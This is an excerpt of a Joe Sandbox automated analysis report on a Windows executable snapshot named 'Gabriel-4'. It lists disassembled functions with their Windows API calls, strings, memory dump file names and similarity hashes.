Instruction Fuzzy Hash: 0A515871A1DA82C6EB34BF20DC551EAE361FB84794FC00131D56E466A5EF3CE645C721

Function 00007FF746501578 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.LIBCMT ref: 00007FF746501598

Part of subcall function 00007FF746502AC0: _FF_MSGBANNER.LIBCMT ref: 00007FF746502AF0
Part of subcall function 00007FF746502AC0: HeapAlloc.KERNEL32 ref: 00007FF746502B15
Part of subcall function 00007FF746502AC0: _callnewh.LIBCMT ref: 00007FF746502B2E
Part of subcall function 00007FF746502AC0: _errno.LIBCMT ref: 00007FF746502B39
Part of subcall function 00007FF746502AC0: _errno.LIBCMT ref: 00007FF746502B44

SetFilePointer.KERNELBASE ref: 00007FF7465015BB
_lread.KERNEL32(?,?,00000000,00007FF746502082), ref: 00007FF7465015D1
_lcreat.KERNEL32 ref: 00007FF7465015EB
lstrcpyA.KERNEL32(?,?,00000000,00007FF746502082), ref: 00007FF746501603
_lwrite.KERNEL32(?,?,00000000,00007FF746502082), ref: 00007FF74650163B
lstrcpyA.KERNEL32(?,?,00000000,00007FF746502082), ref: 00007FF74650165C
free.LIBCMT ref: 00007FF74650166A
_lclose.KERNEL32 ref: 00007FF746501676

Strings

Failed to read setup engine, xrefs: 00007FF746501655
Unable to open setup file, xrefs: 00007FF7465015FC

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: _errnolstrcpy$AllocFileHeapPointer_callnewh_lclose_lcreat_lread_lwritefreemalloc
String ID: Failed to read setup user$Unable to open setup file
API String ID: 3486659530-2055280143
Opcode ID: 29cab160aeda6c346e8218e27bc9a8abeb32b3da51941ff1397b0c7d4ff9c7f7
Instruction ID: 72dfd0a42817f4147b99ac33834f86f0eb772ceb4b4d8fb92123f8bac6a84f93
Opcode Fuzzy Hash: 29cab160aeda6c346e8218e27bc9a8abeb32b3da51941ff1397b0c7d4ff9c7f7
Instruction Fuzzy Hash: 15316131A0DA52C6DB14BF25EC504AAE361EB88B99F9C4130DE2F4B794EE3CE4458720

Function 00007FF746502B80 Relevance: 18.1, APIs: 12, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF746502B92
_FF_MSGBANNER.LIBCMT ref: 00007FF746502BFD
_FF_MSGBANNER.LIBCMT ref: 00007FF746502C28
_RTC_Initialize.LIBCMT ref: 00007FF746502C41
_amsg_exit.LIBCMT ref: 00007FF746502C55
GetCommandLineA.KERNEL32 ref: 00007FF746502C5A
__setargv.LIBCMT ref: 00007FF746502C73
_amsg_exit.LIBCMT ref: 00007FF746502C81
_amsg_exit.LIBCMT ref: 00007FF746502C94
_cinit.LIBCMT ref: 00007FF746502C9E
_amsg_exit.LIBCMT ref: 00007FF746502CA9
_wincmdln.LIBCMT ref: 00007FF746502CAE

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: _amsg_exit$CommandInfoInitializeLineStartup__setargv_cinit_wincmdln
String ID:
API String ID: 4082634633-0
Opcode ID: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
Instruction ID: a04c46c62acbec27d54281c37a1641ebf03553dbfdaff3cf9ac1e9dd2702872a
Opcode Fuzzy Hash: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
Instruction Fuzzy Hash: 8F41B171A0C643C6FA64BB61ED523BBE195AF81744F804035EA6D462D7FE2CE8448662

Function 00007FF74650204C Relevance: 10.6, APIs: 7, Instructions: 57
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7465012AC: _lopen.KERNEL32 ref: 00007FF7465012D4
Part of subcall function 00007FF7465012AC: lstrcpyA.KERNEL32(?,00000000,?,00007FF746502066), ref: 00007FF7465012F2
Part of subcall function 00007FF7465012AC: free.LIBCMT ref: 00007FF74650155E

Sleep.KERNEL32 ref: 00007FF7465020AE
DeleteFileA.KERNEL32 ref: 00007FF7465020C4
DeleteFileA.KERNEL32 ref: 00007FF7465020D1
RemoveDirectoryA.KERNEL32 ref: 00007FF7465020DE

Part of subcall function 00007FF7465019B4: GetCurrentDirectoryA.KERNEL32 ref: 00007FF7465019F5
Part of subcall function 00007FF7465019B4: GetTempPathA.KERNEL32 ref: 00007FF746501A11
Part of subcall function 00007FF7465019B4: lstrlenA.KERNEL32 ref: 00007FF746501A1E
Part of subcall function 00007FF7465019B4: lstrcpyA.KERNEL32 ref: 00007FF746501A48
Part of subcall function 00007FF7465019B4: lstrlenA.KERNEL32 ref: 00007FF746501A58
Part of subcall function 00007FF7465019B4: lstrcatA.KERNEL32 ref: 00007FF746501A74
Part of subcall function 00007FF7465019B4: wsprintfA.USER32 ref: 00007FF746501AA2
Part of subcall function 00007FF7465019B4: wsprintfA.USER32 ref: 00007FF746501ABA
Part of subcall function 00007FF7465019B4: DeleteFileA.KERNELBASE ref: 00007FF746501AC7
Part of subcall function 00007FF7465019B4: RemoveDirectoryA.KERNELBASE ref: 00007FF746501AD1
Part of subcall function 00007FF7465019B4: GetFileAttributesA.KERNELBASE ref: 00007FF746501ADB
Part of subcall function 00007FF7465019B4: CreateDirectoryA.KERNELBASE ref: 00007FF746501AEC
Part of subcall function 00007FF7465019B4: lstrcpyA.KERNEL32 ref: 00007FF746501AFB
Part of subcall function 00007FF7465019B4: SetCurrentDirectoryA.KERNELBASE ref: 00007FF746501B06
Part of subcall function 00007FF7465019B4: lstrcpyA.KERNEL32 ref: 00007FF746501B1C
Part of subcall function 00007FF7465019B4: CreateDirectoryA.KERNEL32 ref: 00007FF746501B29
Part of subcall function 00007FF7465019B4: SetCurrentDirectoryA.KERNEL32 ref: 00007FF746501B34
Part of subcall function 00007FF7465019B4: lstrcpyA.KERNEL32 ref: 00007FF746501B49
Part of subcall function 00007FF7465019B4: lstrlenA.KERNEL32 ref: 00007FF746501B59
Part of subcall function 00007FF7465019B4: lstrcatA.KERNEL32 ref: 00007FF746501B75
Part of subcall function 00007FF7465019B4: lstrcpyA.KERNEL32 ref: 00007FF746501B87

MoveFileExA.KERNEL32 ref: 00007FF7465020EC
MoveFileExA.KERNEL32 ref: 00007FF7465020FF
MoveFileExA.KERNEL32 ref: 00007FF746502112

Part of subcall function 00007FF746501578: malloc.LIBCMT ref: 00007FF746501598
Part of subcall function 00007FF746501578: SetFilePointer.KERNELBASE ref: 00007FF7465015BB
Part of subcall function 00007FF746501578: _lread.KERNEL32(?,?,00000000,00007FF746502082), ref: 00007FF7465015D1
Part of subcall function 00007FF746501578: _lcreat.KERNEL32 ref: 00007FF7465015EB
Part of subcall function 00007FF746501578: lstrcpyA.KERNEL32(?,?,00000000,00007FF746502082), ref: 00007FF746501603
Part of subcall function 00007FF746501578: free.LIBCMT ref: 00007FF74650166A
Part of subcall function 00007FF746501578: _lclose.KERNEL32 ref: 00007FF746501676

Part of subcall function 00007FF746501694: SetFilePointer.KERNELBASE ref: 00007FF7465016C0
Part of subcall function 00007FF746501694: _lread.KERNEL32(?,?,00000000,00007FF746502090), ref: 00007FF7465016D5
Part of subcall function 00007FF746501694: lstrcpyA.KERNEL32(?,?,00000000,00007FF746502090), ref: 00007FF7465016EB
Part of subcall function 00007FF746501694: malloc.LIBCMT ref: 00007FF746501705
Part of subcall function 00007FF746501694: SetFilePointer.KERNELBASE ref: 00007FF746501725
Part of subcall function 00007FF746501694: _lread.KERNEL32(?,?,00000000,00007FF746502090), ref: 00007FF746501739
Part of subcall function 00007FF746501694: _lcreat.KERNEL32 ref: 00007FF746501755
Part of subcall function 00007FF746501694: lstrcpyA.KERNEL32(?,?,00000000,00007FF746502090), ref: 00007FF74650176D
Part of subcall function 00007FF746501694: free.LIBCMT ref: 00007FF7465017D6

Part of subcall function 00007FF746501C88: wsprintfA.USER32 ref: 00007FF746501D31
Part of subcall function 00007FF746501C88: lstrlenA.KERNEL32 ref: 00007FF746501D41
Part of subcall function 00007FF746501C88: lstrcatA.KERNEL32 ref: 00007FF746501D58
Part of subcall function 00007FF746501C88: lstrcatA.KERNEL32 ref: 00007FF746501D65
Part of subcall function 00007FF746501C88: wsprintfA.USER32 ref: 00007FF746501D7D
Part of subcall function 00007FF746501C88: lstrcatA.KERNEL32 ref: 00007FF746501D89
Part of subcall function 00007FF746501C88: lstrcatA.KERNEL32 ref: 00007FF746501D96
Part of subcall function 00007FF746501C88: wsprintfA.USER32 ref: 00007FF746501DAF
Part of subcall function 00007FF746501C88: lstrcatA.KERNEL32 ref: 00007FF746501DBB
Part of subcall function 00007FF746501C88: lstrcatA.KERNEL32 ref: 00007FF746501DC8
Part of subcall function 00007FF746501C88: wsprintfA.USER32 ref: 00007FF746501DE0
Part of subcall function 00007FF746501C88: lstrcatA.KERNEL32 ref: 00007FF746501DEC
Part of subcall function 00007FF746501C88: lstrcatA.KERNEL32 ref: 00007FF746501DF9
Part of subcall function 00007FF746501C88: GetCurrentProcess.KERNEL32 ref: 00007FF746501E04
Part of subcall function 00007FF746501C88: OpenProcessToken.ADVAPI32 ref: 00007FF746501E17
Part of subcall function 00007FF746501C88: malloc.LIBCMT ref: 00007FF746501E35

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: Filelstrcat$lstrcpy$Directory$wsprintf$Currentlstrlen$DeleteMovePointer_lreadfreemalloc$CreateProcessRemove_lcreat$AttributesOpenPathSleepTempToken_lclose_lopen
String ID:
API String ID: 1722154105-0
Opcode ID: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
Instruction ID: 1956cb8d9e44fbc9286402c22999fd19a4382394345789a2acd61ec78a69d9fa
Opcode Fuzzy Hash: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
Instruction Fuzzy Hash: 2B21E035A0C647C2EB14BF72EC606BAE3A1AF95B54FC98030D52E46155FE3CD849C720

Non-executed Functions

Function 00007FF746503D40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_set_error_mode.LIBCMT ref: 00007FF746503D85
_set_error_mode.LIBCMT ref: 00007FF746503D96
GetModuleFileNameW.KERNEL32 ref: 00007FF746503DF8

Part of subcall function 00007FF74650338C: GetCurrentProcess.KERNEL32(00007FF74650342E), ref: 00007FF7465033A4

GetStdHandle.KERNEL32 ref: 00007FF746503F0D
WriteFile.KERNEL32 ref: 00007FF746503F6A

Strings

<program name unknown>, xrefs: 00007FF746503E07
..., xrefs: 00007FF746503E4A
Runtime Error!Program: , xrefs: 00007FF746503DC5
Microsoft Visual C++ Runtime Library, xrefs: 00007FF746503EB1

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 2183313154-4022980321
Opcode ID: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
Instruction ID: 848862aa4fcfa7725980c98d79ef1a60fce072e8dc50fe5d16d823e7aac75684
Opcode Fuzzy Hash: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
Instruction Fuzzy Hash: 6E518D35B0C643C1EB24B725ED156BBE2A5AF89784FC44135EE6D42A89EF3CE506C620

Function 00007FF746502680 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7465033A4,00007FF74650342E), ref: 00007FF746503FF7
RtlLookupFunctionEntry.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7465033A4,00007FF74650342E), ref: 00007FF746504016
RtlVirtualUnwind.KERNEL32 ref: 00007FF746504062
IsDebuggerPresent.KERNEL32 ref: 00007FF7465040D4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7465040EC
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7465040F9
GetCurrentProcess.KERNEL32 ref: 00007FF746504112
TerminateProcess.KERNEL32 ref: 00007FF746504120

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
Instruction ID: 75fcc351a679464d0916fde0faadb000dfb11251eb6bbd5e434b8f289e2c9070
Opcode Fuzzy Hash: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
Instruction Fuzzy Hash: 8131BB7590DB46C5EB50BB55FC5036AE3A4FB84784F80023ADAAD42765EF3CE0448B20

Function 00007FF746503240 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7465032AD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7465032C5
RtlVirtualUnwind.KERNEL32 ref: 00007FF7465032FF
IsDebuggerPresent.KERNEL32 ref: 00007FF746503335
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF74650333F
UnhandledExceptionFilter.KERNEL32 ref: 00007FF74650334A

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
Instruction ID: 2c2e704dddb614c3a80e515a243495e3864f04ad67b1fba3e3385b78babf8ba0
Opcode Fuzzy Hash: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
Instruction Fuzzy Hash: 1231423260CB82C5DB60FB25E8506AFF3A4FB88754F900135EAAD47A95EF38D545CB10

Function 00007FF746501908 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00007FF746501E80), ref: 00007FF74650192B
GetProcAddress.KERNEL32(?,?,?,00007FF746501E80), ref: 00007FF74650194D
FreeLibrary.KERNEL32(?,?,?,00007FF746501E80), ref: 00007FF746501965

Strings

Advapi32.dll, xrefs: 00007FF74650191C
ConvertSidToStringSidA, xrefs: 00007FF746501943

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Advapi32.dll$ConvertSidToStringSidA
API String ID: 145871493-1798845326
Opcode ID: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
Instruction ID: f1cf94da674154c296f1a955fbaaebfef81636994d4fb96f77166136738fd67d
Opcode Fuzzy Hash: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
Instruction Fuzzy Hash: ABF06D25B0DF41C5EF54BF52F994126E2A0AF48BC0F888434EE6E43B44FE3CD4458220

Function 00007FF746504D20 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF746504D57
GetCurrentProcessId.KERNEL32 ref: 00007FF746504D62
GetCurrentThreadId.KERNEL32 ref: 00007FF746504D6E
GetTickCount.KERNEL32 ref: 00007FF746504D7A
QueryPerformanceCounter.KERNEL32 ref: 00007FF746504D8B

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
Instruction ID: dfd1279fa2c0d913cdc5e90ac8a82fb3b75c753a8eb7f0c30ffb95c106cd1da3
Opcode Fuzzy Hash: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
Instruction Fuzzy Hash: 5901886162DE02C1EB50FF21ED5466AE374FB45B90F846630EE6E477A0EE3CD8858710

Function 00007FF7465042FC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF746504307

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
Instruction ID: 62d9f5d55939ad66b97a0501a55fabff5cd23007284a09fcc078ac9b9bb3d04f
Opcode Fuzzy Hash: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
Instruction Fuzzy Hash: 5AB09214F1D842C1DA04BB21DC85062D2A06F9C300FC10430C02D80120EE5CD19B8710

Function 00007FF746506424 Relevance: 107.7, APIs: 86, Instructions: 180
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.LIBCMT ref: 00007FF746506439

Part of subcall function 00007FF746502A80: RtlFreeHeap.NTDLL ref: 00007FF746502A96
Part of subcall function 00007FF746502A80: _errno.LIBCMT ref: 00007FF746502AA0
Part of subcall function 00007FF746502A80: GetLastError.KERNEL32 ref: 00007FF746502AA8

free.LIBCMT ref: 00007FF746506442
free.LIBCMT ref: 00007FF74650644B
free.LIBCMT ref: 00007FF746506454
free.LIBCMT ref: 00007FF74650645D
free.LIBCMT ref: 00007FF746506466
free.LIBCMT ref: 00007FF74650646E
free.LIBCMT ref: 00007FF746506477
free.LIBCMT ref: 00007FF746506480
free.LIBCMT ref: 00007FF746506489
free.LIBCMT ref: 00007FF746506492
free.LIBCMT ref: 00007FF74650649B
free.LIBCMT ref: 00007FF7465064A4
free.LIBCMT ref: 00007FF7465064AD
free.LIBCMT ref: 00007FF7465064B6
free.LIBCMT ref: 00007FF7465064BF
free.LIBCMT ref: 00007FF7465064CB
free.LIBCMT ref: 00007FF7465064D7
free.LIBCMT ref: 00007FF7465064E3
free.LIBCMT ref: 00007FF7465064EF
free.LIBCMT ref: 00007FF7465064FB
free.LIBCMT ref: 00007FF746506507
free.LIBCMT ref: 00007FF746506513
free.LIBCMT ref: 00007FF74650651F
free.LIBCMT ref: 00007FF74650652B
free.LIBCMT ref: 00007FF746506537
free.LIBCMT ref: 00007FF746506543
free.LIBCMT ref: 00007FF74650654F
free.LIBCMT ref: 00007FF74650655B
free.LIBCMT ref: 00007FF746506567
free.LIBCMT ref: 00007FF746506573
free.LIBCMT ref: 00007FF74650657F
free.LIBCMT ref: 00007FF74650658B
free.LIBCMT ref: 00007FF746506597
free.LIBCMT ref: 00007FF7465065A3
free.LIBCMT ref: 00007FF7465065AF
free.LIBCMT ref: 00007FF7465065BB
free.LIBCMT ref: 00007FF7465065C7
free.LIBCMT ref: 00007FF7465065D3
free.LIBCMT ref: 00007FF7465065DF
free.LIBCMT ref: 00007FF7465065EB
free.LIBCMT ref: 00007FF7465065F7
free.LIBCMT ref: 00007FF746506603
free.LIBCMT ref: 00007FF74650660F
free.LIBCMT ref: 00007FF74650661B
free.LIBCMT ref: 00007FF746506627
free.LIBCMT ref: 00007FF746506633
free.LIBCMT ref: 00007FF74650663F
free.LIBCMT ref: 00007FF74650664B
free.LIBCMT ref: 00007FF746506657
free.LIBCMT ref: 00007FF746506663
free.LIBCMT ref: 00007FF74650666F
free.LIBCMT ref: 00007FF74650667B
free.LIBCMT ref: 00007FF746506687
free.LIBCMT ref: 00007FF746506693
free.LIBCMT ref: 00007FF74650669F
free.LIBCMT ref: 00007FF7465066AB
free.LIBCMT ref: 00007FF7465066B7
free.LIBCMT ref: 00007FF7465066C3
free.LIBCMT ref: 00007FF7465066CF
free.LIBCMT ref: 00007FF7465066DB
free.LIBCMT ref: 00007FF7465066E7
free.LIBCMT ref: 00007FF7465066F3
free.LIBCMT ref: 00007FF7465066FF
free.LIBCMT ref: 00007FF74650670B
free.LIBCMT ref: 00007FF746506717
free.LIBCMT ref: 00007FF746506723
free.LIBCMT ref: 00007FF74650672F
free.LIBCMT ref: 00007FF74650673B
free.LIBCMT ref: 00007FF746506747
free.LIBCMT ref: 00007FF746506753
free.LIBCMT ref: 00007FF74650675F
free.LIBCMT ref: 00007FF74650676B
free.LIBCMT ref: 00007FF746506777
free.LIBCMT ref: 00007FF746506783
free.LIBCMT ref: 00007FF74650678F
free.LIBCMT ref: 00007FF74650679B
free.LIBCMT ref: 00007FF7465067A7
free.LIBCMT ref: 00007FF7465067B3
free.LIBCMT ref: 00007FF7465067BF
free.LIBCMT ref: 00007FF7465067CB
free.LIBCMT ref: 00007FF7465067D7
free.LIBCMT ref: 00007FF7465067E3
free.LIBCMT ref: 00007FF7465067EF
free.LIBCMT ref: 00007FF7465067FB
free.LIBCMT ref: 00007FF746506807

Memory Dump Source

Source File: 00000000.00000002.2228825969.00007FF746501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF746500000, based on PE: true

Associated: 00000000.00000002.2228809783.00007FF746500000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228845156.00007FF746508000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228864944.00007FF74650C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff746500000_Gabriel-4.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 38c5fe463394c08e12a9a6354ee852dc3d8d4bc07c49ae58647bb7e9c07ea56b
Instruction ID: fbb375e6c7bc5b9ee92502d70bc4576850729c7c708f365595b18821ce9405a2
Opcode Fuzzy Hash: 38c5fe463394c08e12a9a6354ee852dc3d8d4bc07c49ae58647bb7e9c07ea56b
Instruction Fuzzy Hash: 87A1643261E547C1EA51BA31DC952FFE320AF84B44F944132DA6E4A9A7DE94D849C3E0

Function 00007FF746505D98 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505DDD
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505DF9
EncodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505E0B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505E22
EncodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505E2B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505E42
EncodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505E4B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505E62
EncodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505E6B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505E8A
EncodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505E93
DecodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505EC6
DecodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505ED6
DecodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505F2C
DecodePointer.KERNEL32(?,?,?,00000000,00007FF746503FD4,00007FF746502E80), ref: 00007FF746505F4D
